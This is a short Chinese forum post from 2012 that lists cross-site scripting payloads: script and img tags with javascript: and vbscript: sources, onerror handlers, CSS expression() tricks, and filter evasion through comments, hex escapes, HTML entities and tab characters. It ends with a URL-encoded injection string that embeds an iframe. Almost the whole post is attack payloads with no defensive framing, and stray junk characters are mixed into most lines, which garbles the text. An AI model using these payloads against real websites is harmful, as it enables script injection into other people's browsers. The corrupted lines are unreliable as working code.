<script>alert("跨站")</script> (最常用)7 ?: x; F6 f* a9 F/ A
<img scr=javascript:alert("跨站")></img>: F0 b$ @* c. G' Y
<img scr="javascript: alert(/跨站/)></img>" t t9 J+ |% `$ H0 Y, N# q/ L
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)$ ^% u& V# Y- Q- y) ?& D
<img scr="#" onerror=alert(/跨站/)></img>) K4 v) ]& K4 U1 `
<img scr="#" style="xss:expression(alert(/xss/));"></img>( H( {' t5 o, i+ R- ?# [
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
% p6 |( u* C% e. [: j<img src=vbscript:msgbox ("xss")></img>. g" j9 c# E# q' y
<style> input {left:expression (alert('xss'))}</style>& W# D( Z% g" z& f! G
<div style={left:expression (alert('xss'))}></div>( v% r9 q+ y# i P/ T" s; K, n
<div style={left:exp/* */ression (alert('xss'))}></div>
# I! h/ P" N5 Z2 {<div style={left:\0065\0078ression (alert('xss'))}></div>0 ~' n8 C- h ^, u7 g
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>4 O: p0 S4 _2 e, Z
unicode <div style="{left:expRessioN (alert('xss'))}">/ p) v) ]2 U9 {+ ~9 O3 H
, @7 J: ^4 n# G7 x9 [! i% u' c- b) v! }
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
6 _- q, P s8 |, f# k7 i% i' ]/ K |
发表于 2012-9-13 17:15:04
收藏
支持
反对